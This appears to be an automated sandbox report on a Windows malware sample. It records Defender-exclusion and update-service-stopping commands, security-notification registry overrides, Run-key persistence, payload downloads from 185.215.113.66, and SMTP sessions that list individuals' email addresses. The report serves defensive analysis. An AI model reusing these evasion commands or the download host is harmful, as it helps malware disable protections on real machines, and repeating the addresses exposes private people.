Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | July 26, 2024, 11:57 a.m. | July 26, 2024, noon |
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
2156-
powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
2276
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
2200
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
mx2c1.comcast.net | 96.102.18.146 | |
aim.com |
MX
mx-aol.mail.gm0.yahoodns.net
|
13.248.158.7 |
ntlworld.com |
MX
mxin10.virginmedia.com
MX
mxin5.virginmedia.com
|
213.105.9.42 |
icanhazip.com | 104.16.184.241 | |
mx2.mxge.comcast.net | 96.102.18.147 | |
cox.net |
MX
cxr.mx.a.cloudfilter.net
|
98.182.1.143 |
charter.net |
MX
mx0.charter.net
|
99.83.251.242 |
mx1h1.comcast.net | 96.102.157.181 | |
comcast.net |
MX
mx1c1.comcast.net
MX
mx2.mxge.comcast.net
MX
mx1a1.comcast.net
MX
mx1h1.comcast.net
MX
mx2c1.comcast.net
MX
mx1.mxge.comcast.net
MX
mx2a1.comcast.net
MX
mx2h1.comcast.net
|
96.99.227.0 |
mx2h1.comcast.net | 96.102.157.180 | |
mx0.charter.net | 47.43.18.9 | |
optonline.net |
MX
mx.altice.prod.cloud.openwave.ai
|
167.206.148.154 |
mx.altice.prod.cloud.openwave.ai | 65.20.63.100 | |
ff-ip4-mx-vip1.prodigy.net | 144.160.159.21 | |
verizon.net |
MX
mx-aol.mail.gm0.yahoodns.net
|
72.21.81.253 |
mta6.am0.yahoodns.net | 67.195.228.106 | |
netzero.net |
MX
mx.dca.untd.com
MX
mx.vgs.untd.com
|
64.136.45.168 |
cxr.mx.a.cloudfilter.net | 34.212.80.54 | |
juno.com |
MX
mx.vgs.untd.com
MX
mx.dca.untd.com
|
64.136.53.46 |
www.update.microsoft.com | 20.109.209.108 | |
yahoo.com |
MX
mta5.am0.yahoodns.net
MX
mta7.am0.yahoodns.net
MX
mta6.am0.yahoodns.net
|
74.6.143.25 |
mail.com |
MX
mx00.mail.com
MX
mx01.mail.com
|
82.165.229.87 |
att.net |
MX
ff-ip4-mx-vip1.prodigy.net
MX
ff-ip4-mx-vip2.prodigy.net
MX
al-ip4-mx-vip2.prodigy.net
MX
al-ip4-mx-vip1.prodigy.net
|
144.160.36.42 |
mx-aol.mail.gm0.yahoodns.net | 98.136.96.92 | |
mx01.mail.com | 74.208.5.22 | |
mx.dca.untd.com | 64.136.44.37 | |
mx1a1.comcast.net | 96.103.145.163 | |
al-ip4-mx-vip2.prodigy.net | 144.160.235.144 | |
al-ip4-mx-vip1.prodigy.net | 144.160.235.143 | |
mxin5.virginmedia.com | 84.116.6.18 | |
mx.vgs.untd.com | 64.136.52.37 | |
bellsouth.net |
MX
ff-ip4-mx-vip1.prodigy.net
MX
ff-ip4-mx-vip2.prodigy.net
MX
al-ip4-mx-vip2.prodigy.net
MX
al-ip4-mx-vip1.prodigy.net
|
216.77.188.73 |
sbcglobal.net |
MX
ff-ip4-mx-vip1.prodigy.net
MX
ff-ip4-mx-vip2.prodigy.net
MX
al-ip4-mx-vip2.prodigy.net
MX
al-ip4-mx-vip1.prodigy.net
|
IP Address | Status | Action |
---|---|---|
104.16.185.241 | Active | Moloch |
109.74.35.21 | Active | Moloch |
109.74.43.21 | Active | Moloch |
144.160.159.21 | Active | Moloch |
144.160.235.143 | Active | Moloch |
144.160.235.144 | Active | Moloch |
151.241.237.185 | Active | Moloch |
164.124.101.2 | Active | Moloch |
185.215.113.66 | Active | Moloch |
194.93.26.210 | Active | Moloch |
195.158.22.13 | Active | Moloch |
2.185.163.114 | Active | Moloch |
20.109.209.108 | Active | Moloch |
213.230.90.222 | Active | Moloch |
217.30.160.154 | Active | Moloch |
35.162.106.154 | Active | Moloch |
47.43.18.9 | Active | Moloch |
5.238.186.28 | Active | Moloch |
64.136.44.37 | Active | Moloch |
64.136.52.37 | Active | Moloch |
65.20.63.100 | Active | Moloch |
67.195.204.75 | Active | Moloch |
67.195.204.80 | Active | Moloch |
67.195.228.111 | Active | Moloch |
74.208.5.22 | Active | Moloch |
77.221.27.219 | Active | Moloch |
77.91.77.92 | Active | Moloch |
78.85.106.173 | Active | Moloch |
83.239.55.170 | Active | Moloch |
84.116.6.18 | Active | Moloch |
86.62.3.154 | Active | Moloch |
95.58.72.245 | Active | Moloch |
95.59.4.234 | Active | Moloch |
96.102.157.180 | Active | Moloch |
96.102.157.181 | Active | Moloch |
96.102.18.146 | Active | Moloch |
96.102.18.147 | Active | Moloch |
96.103.145.163 | Active | Moloch |
98.136.96.92 | Active | Moloch |
98.136.96.93 | Active | Moloch |
Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.66/1 | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.66/ns/n.txt | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.66/2 | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.66/ns/91.txt | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.66/3 | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.66/4 | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.66/5 |
request | GET http://185.215.113.66/1 |
request | GET http://icanhazip.com/ |
request | GET http://185.215.113.66/ns/n.txt |
request | GET http://185.215.113.66/2 |
request | GET http://185.215.113.66/ns/91.txt |
request | GET http://185.215.113.66/3 |
request | GET http://185.215.113.66/4 |
request | GET http://185.215.113.66/5 |
ip | 109.74.35.21 |
ip | 109.74.43.21 |
ip | 194.93.26.210 |
ip | 195.158.22.13 |
ip | 2.185.163.114 |
ip | 213.230.90.222 |
ip | 217.30.160.154 |
ip | 5.238.186.28 |
ip | 77.221.27.219 |
ip | 78.85.106.173 |
ip | 95.58.72.245 |
description | sysarddrvs.exe tried to sleep 209 seconds, actually delayed analysis time by 209 seconds |
domain | icanhazip.com |
file | C:\Users\test22\AppData\Local\Temp\158876794.exe |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS |
cmdline | "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS |
cmdline | powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" |
cmdline | "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" |
cmdline | cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" |
file | C:\Users\test22\AppData\Local\Temp\158876794.exe |
cmdline | cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS |
cmdline | sc stop UsoSvc |
cmdline | sc stop DoSvc |
cmdline | sc stop WaaSMedicSvc |
cmdline | "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS |
cmdline | sc stop BITS |
cmdline | sc stop wuauserv |
receiver | [] | sender | [] | server | 67.195.228.111 | |||||||||
receiver | [] | sender | [] | server | 35.162.106.154 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [] | server | 35.162.106.154 | |||||||||
receiver | [] | sender | [] | server | 96.102.18.147 | |||||||||
receiver | [] | sender | [] | server | 35.162.106.154 | |||||||||
receiver | [] | sender | [] | server | 65.20.63.100 | |||||||||
receiver | [] | sender | [] | server | 65.20.63.100 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [] | server | 74.208.5.22 | |||||||||
receiver | [] | sender | [] | server | 74.208.5.22 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [u'gris.mora@sbcglobal.net'] | server | 144.160.159.21 | |||||||||
receiver | [] | sender | [u'joelcisneros@sbcglobal.net'] | server | 144.160.159.21 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [u'kathleenteall@att.net'] | server | 144.160.235.143 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [u'par1202@att.net'] | server | 144.160.235.143 | |||||||||
receiver | [] | sender | [u'bridget.harper@sbcglobal.net'] | server | 144.160.159.21 | |||||||||
receiver | [] | sender | [] | server | 84.116.6.18 | |||||||||
receiver | [] | sender | [] | server | 74.208.5.22 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [] | server | 84.116.6.18 | |||||||||
receiver | [] | sender | [u'lordsonny@sbcglobal.net'] | server | 144.160.159.21 | |||||||||
receiver | [] | sender | [u'briggan@att.net'] | server | 144.160.235.143 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [] | server | 65.20.63.100 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [u'shan_white@sbcglobal.net'] | server | 144.160.159.21 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [u'eatatum@att.net'] | server | 144.160.235.143 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [u'eandjkirkland@att.net'] | server | 144.160.235.143 | |||||||||
receiver | [u'gmbeck1@verizon.net'] | sender | [u'gmbeck1@verizon.net'] | server | 98.136.96.93 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [u'mguers4@verizon.net'] | sender | [u'mguers4@verizon.net'] | server | 98.136.96.93 | |||||||||
receiver | [] | sender | [] | server | 35.162.106.154 | |||||||||
receiver | [u'awwitskittenx@aim.com'] | sender | [u'awwitskittenx@aim.com'] | server | 98.136.96.93 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [u'bluesniper911@aim.com'] | sender | [u'bluesniper911@aim.com'] | server | 98.136.96.93 | |||||||||
receiver | [] | sender | [] | server | 96.102.157.181 | |||||||||
receiver | [] | sender | [] | server | 84.116.6.18 |
host | 109.74.35.21 | |||
host | 109.74.43.21 | |||
host | 151.241.237.185 | |||
host | 185.215.113.66 | |||
host | 194.93.26.210 | |||
host | 195.158.22.13 | |||
host | 2.185.163.114 | |||
host | 213.230.90.222 | |||
host | 217.30.160.154 | |||
host | 5.238.186.28 | |||
host | 77.221.27.219 | |||
host | 77.91.77.92 | |||
host | 78.85.106.173 | |||
host | 83.239.55.170 | |||
host | 86.62.3.154 | |||
host | 95.58.72.245 | |||
host | 95.59.4.234 |
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings | reg_value | C:\Windows\sysarddrvs.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride |
file | C:\Users\test22\AppData\Local\Temp\newtpp.exe:Zone.Identifier |
file | C:\Users\test22\AppData\Local\Temp\158876794.exe:Zone.Identifier |
file | C:\Windows\sysarddrvs.exe:Zone.Identifier |
description | attempts to disable antivirus notifications | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride | ||||||
description | attempts to disable antivirus notifications | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify | ||||||
description | attempts to disable firewall notifications | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify | ||||||
description | attempts to disable firewall notifications | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride | ||||||
description | attempts to disable windows update notifications | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify |
service | wuauserv (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start) |
service | BITS (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start) |
dead_host | 95.59.4.234:40500 |
dead_host | 35.162.106.154:25 |
dead_host | 47.43.18.9:25 |
dead_host | 77.91.77.92:80 |
dead_host | 151.241.237.185:40500 |
dead_host | 64.136.44.37:25 |
dead_host | 96.102.157.180:25 |
dead_host | 84.116.6.18:25 |
dead_host | 192.168.56.103:50204 |
dead_host | 192.168.56.103:50121 |
dead_host | 65.20.63.100:25 |
dead_host | 96.103.145.163:25 |
dead_host | 83.239.55.170:40500 |
dead_host | 74.208.5.22:25 |
dead_host | 86.62.3.154:40500 |
dead_host | 96.102.18.147:25 |
dead_host | 64.136.52.37:25 |
dead_host | 96.102.157.181:25 |